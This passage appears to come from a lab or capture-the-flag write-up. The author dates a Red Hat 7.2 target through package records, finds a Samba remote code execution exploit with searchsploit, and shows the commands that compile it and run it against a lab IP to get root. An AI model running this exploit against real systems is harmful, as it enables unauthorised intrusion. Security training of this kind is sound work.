Where rpm.pbone.net is the website that has the details about packages in Redhat linux.

We’ve got the date from the package. We can use wikipedia’s Redhat’s version history page to find the version of Redhat.

We’ve got the Redhat version as 7.2, since the date it released is around the date we’ve discovered in rpm.pbone.net.

Performing a google search with the redhat version has presented us with the following information.

Using searchsploit presented the following information.

The exploit we are looking for is the Remote code execution one. I compiled it with

gcc 10.c -o samba

and ran it with the following command

./samba -b 0 -v 192.168.1.8

where -b 0 specifies the platform and -v is used for verbose output.

And Viola!

We are root. Again!